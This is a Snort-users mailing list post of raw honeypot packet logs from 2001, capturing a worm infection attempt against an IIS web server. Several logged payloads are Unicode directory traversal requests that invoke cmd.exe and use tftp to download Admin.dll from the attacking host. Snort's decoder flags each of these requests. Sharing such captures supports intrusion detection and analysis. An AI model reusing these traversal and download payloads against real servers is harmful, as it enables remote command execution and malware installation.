Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 36 3A 34 36 20 47 4D 54 0D 0A 43 6F 6E 74 :06:46 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25887) [2001-09-18 10:23:05] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=1035 flags=0 offset=0 TTL=128 chksum=17808 TCP: port=80 -> dport: 3995 flags=***A***F seq=638223 ack=491921464 off=5 res=0 win=8605 urp=0 chksum=53875 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25901) [2001-09-18 10:23:06] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=22716 flags=0 offset=0 TTL=118 chksum=64222 TCP: port=3995 -> dport: 80 flags=*****R** seq=491921464 ack=0 off=5 res=0 win=0 urp=0 chksum=45366 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25902) [2001-09-18 10:23:06] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=22972 flags=0 offset=0 TTL=118 chksum=63962 TCP: port=4242 -> dport: 80 flags=******S* seq=491923784 ack=0 off=6 res=0 win=8192 urp=0 chksum=28533 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25903) [2001-09-18 10:23:06] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=3595 flags=0 offset=0 TTL=128 chksum=15244 TCP: port=80 -> dport: 4242 flags=***A**S* seq=638788 ack=491923785 off=6 res=0 win=8760 urp=0 chksum=44510 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25904) [2001-09-18 10:23:06] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=23228 flags=0 offset=0 TTL=118 chksum=14559 TCP: port=3995 -> dport: 80 flags=*****R** seq=491921464 ack=491921464 off=5 res=0 win=0 urp=0 chksum=29612 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25916) [2001-09-18 10:23:06] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=32700 flags=0 offset=0 TTL=119 chksum=53982 TCP: port=4242 -> dport: 80 flags=***A**** seq=491923785 ack=638789 off=5 res=0 win=8760 urp=0 chksum=50587 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25917) [2001-09-18 10:23:06] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=195 ID=32956 flags=0 offset=0 TTL=119 chksum=53571 TCP: port=4242 -> dport: 80 flags=***AP*** seq=491923785 ack=638789 off=5 res=0 win=8760 urp=0 chksum=33810 Payload: length = 139 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t 030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243 040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d 050 : 6C 6C 20 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll d:\Admin.dll 060 : 25 32 30 64 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 %20d:\Admin.dll 070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host: 080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne ---------------------------------------------------------------------------- -- #(2 - 25918) [2001-09-18 10:23:06] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=5131 flags=0 offset=0 TTL=128 chksum=13357 TCP: port=80 -> dport: 4242 flags=***AP*** seq=638789 ack=491923940 off=5 res=0 win=8605 urp=0 chksum=22617 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 36 3A 34 37 20 47 4D 54 0D 0A 43 6F 6E 74 :06:47 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 25919) [2001-09-18 10:23:06] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=5387 flags=0 offset=0 TTL=128 chksum=13456 TCP: port=80 -> dport: 4242 flags=***A***F seq=639144 ack=491923940 off=5 res=0 win=8605 urp=0 chksum=50231 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25928) [2001-09-18 10:23:06] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=46780 flags=0 offset=0 TTL=118 chksum=40158 TCP: port=4242 -> dport: 80 flags=*****R** seq=491923940 ack=0 off=5 res=0 win=0 urp=0 chksum=42643 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25929) [2001-09-18 10:23:06] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=47036 flags=0 offset=0 TTL=118 chksum=39898 TCP: port=4276 -> dport: 80 flags=******S* seq=491924169 ack=0 off=6 res=0 win=8192 urp=0 chksum=28114 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25930) [2001-09-18 10:23:06] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=7947 flags=0 offset=0 TTL=128 chksum=10892 TCP: port=80 -> dport: 4276 flags=***A**S* seq=639539 ack=491924170 off=6 res=0 win=8760 urp=0 chksum=43340 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25931) [2001-09-18 10:23:06] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=47292 flags=0 offset=0 TTL=118 chksum=56030 TCP: port=4242 -> dport: 80 flags=*****R** seq=491923940 ack=491923940 off=5 res=0 win=0 urp=0 chksum=24413 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25932) [2001-09-18 10:23:07] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=57276 flags=0 offset=0 TTL=119 chksum=29406 TCP: port=4276 -> dport: 80 flags=***A**** seq=491924170 ack=639540 off=5 res=0 win=8760 urp=0 chksum=49417 Payload: none ---------------------------------------------------------------------------- -- #(2 - 25933) [2001-09-18 10:23:07] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=195 ID=60604 flags=0 offset=0 TTL=119 chksum=25923 TCP: port=4276 -> dport: 80 flags=***AP*** seq=491924170 ack=639540 off=5 res=0 win=8760 urp=0 chksum=32639 Payload: length = 139 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73 74 65 5c../winnt/syste 020 : 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63 2B 74 m32/cmd.exe?/c+t 030 : 66 74 70 20 2D 69 20 36 35 2E 32 39 2E 32 34 33 ftp -i 65.29.243 040 : 2E 31 38 30 20 47 45 54 20 41 64 6D 69 6E 2E 64 .180 GET Admin.d 050 : 6C 6C 20 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 ll e:\Admin.dll 060 : 25 32 30 65 3A 5C 41 64 6D 69 6E 2E 64 6C 6C 20 %20e:\Admin.dll 070 : 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A 20 HTTP/1.0..Host: 080 : 77 77 77 0D 0A 43 6F 6E 6E 6E 65 www..Connne ---------------------------------------------------------------------------- -- #(2 - 25934) [2001-09-18 10:23:07] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=9483 flags=0 offset=0 TTL=128 chksum=9360 TCP: port=80 -> dport: 4276 flags=***A**** seq=639540 ack=491924325 off=5 res=0 win=8605 urp=0 chksum=49417 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26077) [2001-09-18 10:24:43] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=50956 flags=0 offset=0 TTL=118 chksum=35982 TCP: port=4966 -> dport: 80 flags=*****R** seq=502634226 ack=0 off=5 res=0 win=0 urp=0 chksum=13838 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26078) [2001-09-18 10:24:43] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=44 ID=51212 flags=0 offset=0 TTL=118 chksum=35722 TCP: port=5000 -> dport: 80 flags=******S* seq=502634388 ack=0 off=6 res=0 win=8192 urp=0 chksum=64911 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26079) [2001-09-18 10:24:43] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=44 ID=56846 flags=0 offset=0 TTL=128 chksum=27528 TCP: port=80 -> dport: 5000 flags=***A**S* seq=736589 ack=502634389 off=6 res=0 win=8760 urp=0 chksum=48622 Options: #1 - MSS len=4 data=05B4 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26080) [2001-09-18 10:24:43] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=51468 flags=0 offset=0 TTL=118 chksum=51854 TCP: port=4966 -> dport: 80 flags=*****R** seq=502634226 ack=502634226 off=5 res=0 win=0 urp=0 chksum=33062 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26081) [2001-09-18 10:24:44] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=65292 flags=0 offset=0 TTL=119 chksum=21390 TCP: port=5000 -> dport: 80 flags=***A**** seq=502634389 ack=736590 off=5 res=0 win=8760 urp=0 chksum=54699 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26082) [2001-09-18 10:24:44] spp_unidecode: Unicode Directory Transversal attack detected IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=116 ID=13 flags=0 offset=0 TTL=119 chksum=21058 TCP: port=5000 -> dport: 80 flags=***AP*** seq=502634389 ack=736590 off=5 res=0 win=8760 urp=0 chksum=4731 Payload: length = 74 000 : 47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25 GET /scripts/..% 010 : 32 66 2E 2E 2F 41 64 6D 69 6E 2E 64 6C 6C 20 6C 2f../Admin.dll l 020 : 20 48 54 54 50 2F 31 2E 30 0D 0A 48 6F 73 74 3A HTTP/1.0..Host: 030 : 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65 63 74 69 6F www..Connnectio 040 : 6E 3A 20 63 6C 6F 73 65 0D 0A n: close.. ---------------------------------------------------------------------------- -- #(2 - 26083) [2001-09-18 10:24:44] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=279 ID=57102 flags=0 offset=0 TTL=128 chksum=27037 TCP: port=80 -> dport: 5000 flags=***AP*** seq=736590 ack=502634465 off=5 res=0 win=8684 urp=0 chksum=40987 Payload: length = 239 000 : 48 54 54 50 2F 31 2E 31 20 35 30 30 20 53 65 72 HTTP/1.1 500 Ser 010 : 76 65 72 20 45 72 72 6F 72 0D 0A 53 65 72 76 65 ver Error..Serve 020 : 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 53 r: Microsoft-IIS 030 : 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 2C /4.0..Date: Tue, 040 : 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 3A 18 Sep 2001 16: 050 : 30 38 3A 32 34 20 47 4D 54 0D 0A 43 6F 6E 74 65 08:24 GMT..Conte 060 : 6E 74 2D 54 79 70 65 3A 20 74 65 78 74 2F 68 74 nt-Type: text/ht 070 : 6D 6C 0D 0A 43 6F 6E 74 65 6E 74 2D 4C 65 6E 67 ml..Content-Leng 080 : 74 68 3A 20 31 30 30 0D 0A 0D 0A 3C 68 74 6D 6C th: 100....<html 090 : 3E 3C 68 65 61 64 3E 3C 74 69 74 6C 65 3E 45 72 ><head><title>Er 0a0 : 72 6F 72 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 ror</title></hea 0b0 : 64 3E 3C 62 6F 64 79 3E 54 68 65 20 73 70 65 63 d><body>The spec 0c0 : 69 66 69 65 64 20 6D 6F 64 75 6C 65 20 63 6F 75 ified module cou 0d0 : 6C 64 20 6E 6F 74 20 62 65 20 66 6F 75 6E 64 2E ld not be found. 0e0 : 20 3C 2F 62 6F 64 79 3E 3C 2F 68 74 6D 6C 3E </body></html> ---------------------------------------------------------------------------- -- #(2 - 26084) [2001-09-18 10:24:44] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=57358 flags=0 offset=0 TTL=128 chksum=27020 TCP: port=80 -> dport: 5000 flags=***A***F seq=736829 ack=502634465 off=5 res=0 win=8684 urp=0 chksum=54459 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26085) [2001-09-18 10:24:44] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=17933 flags=0 offset=0 TTL=118 chksum=3470 TCP: port=5000 -> dport: 80 flags=*****R** seq=502634465 ack=1819263436 off=5 res=0 win=0 urp=0 chksum=1729 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26100) [2001-09-18 10:24:47] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=395 ID=62478 flags=0 offset=0 TTL=128 chksum=21545 TCP: port=80 -> dport: 4276 flags=***AP*** seq=639540 ack=491924326 off=5 res=0 win=8605 urp=0 chksum=21445 Payload: length = 355 000 : 48 54 54 50 2F 31 2E 31 20 35 30 32 20 47 61 74 HTTP/1.1 502 Gat 010 : 65 77 61 79 20 45 72 72 6F 72 0D 0A 53 65 72 76 eway Error..Serv 020 : 65 72 3A 20 4D 69 63 72 6F 73 6F 66 74 2D 49 49 er: Microsoft-II 030 : 53 2F 34 2E 30 0D 0A 44 61 74 65 3A 20 54 75 65 S/4.0..Date: Tue 040 : 2C 20 31 38 20 53 65 70 20 32 30 30 31 20 31 36 , 18 Sep 2001 16 050 : 3A 30 38 3A 32 38 20 47 4D 54 0D 0A 43 6F 6E 74 :08:28 GMT..Cont 060 : 65 6E 74 2D 4C 65 6E 67 74 68 3A 20 32 31 35 0D ent-Length: 215. 070 : 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74 .Content-Type: t 080 : 65 78 74 2F 68 74 6D 6C 0D 0A 0D 0A 3C 68 65 61 ext/html....<hea 090 : 64 3E 3C 74 69 74 6C 65 3E 45 72 72 6F 72 20 69 d><title>Error i 0a0 : 6E 20 43 47 49 20 41 70 70 6C 69 63 61 74 69 6F n CGI Applicatio 0b0 : 6E 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 3E n</title></head> 0c0 : 0A 3C 62 6F 64 79 3E 3C 68 31 3E 43 47 49 20 45 .<body><h1>CGI E 0d0 : 72 72 6F 72 3C 2F 68 31 3E 54 68 65 20 73 70 65 rror</h1>The spe 0e0 : 63 69 66 69 65 64 20 43 47 49 20 61 70 70 6C 69 cified CGI appli 0f0 : 63 61 74 69 6F 6E 20 6D 69 73 62 65 68 61 76 65 cation misbehave 100 : 64 20 62 79 20 6E 6F 74 20 72 65 74 75 72 6E 69 d by not returni 110 : 6E 67 20 61 20 63 6F 6D 70 6C 65 74 65 20 73 65 ng a complete se 120 : 74 20 6F 66 20 48 54 54 50 20 68 65 61 64 65 72 t of HTTP header 130 : 73 2E 20 20 54 68 65 20 68 65 61 64 65 72 73 20 s. The headers 140 : 69 74 20 64 69 64 20 72 65 74 75 72 6E 20 61 72 it did return ar 150 : 65 3A 3C 70 3E 3C 70 3E 3C 70 72 65 3E 3C 2F 70 e:<p><p><pre></p 160 : 72 65 3E re> ---------------------------------------------------------------------------- -- #(2 - 26101) [2001-09-18 10:24:47] Honeypot Data out IPv4: XX.XX.XX.XX -> 65.29.243.180 hlen=5 TOS=0 dlen=40 ID=62734 flags=0 offset=0 TTL=128 chksum=21644 TCP: port=80 -> dport: 4276 flags=***A***F seq=639895 ack=491924326 off=5 res=0 win=8605 urp=0 chksum=49060 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26102) [2001-09-18 10:24:47] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=43279 flags=0 offset=0 TTL=118 chksum=43659 TCP: port=4276 -> dport: 80 flags=*****R** seq=491924326 ack=502634566 off=5 res=0 win=0 urp=0 chksum=61107 Payload: none ---------------------------------------------------------------------------- -- #(2 - 26103) [2001-09-18 10:24:48] Honeypot Data IPv4: 65.29.243.180 -> XX.XX.XX.XX hlen=5 TOS=0 dlen=40 ID=44047 flags=0 offset=0 TTL=118 chksum=59275 TCP: port=4276 -> dport: 80 flags=*****R** seq=491924326 ack=491924326 off=5 res=0 win=0 urp=0 chksum=23607 Payload: none _______________________________________________ Snort-users mailing list Snort-users () lists sourceforge net Go to this URL to change user options or unsubscribe: https://lists.sourceforge.net/lists/listinfo/snort-users Snort-users list archive: http://www.geocrawler.com/redir-sf.php3?list=snort-users
Current thread:
- Packet logs of Concept V.5 infection Steve Halligan (Sep 18)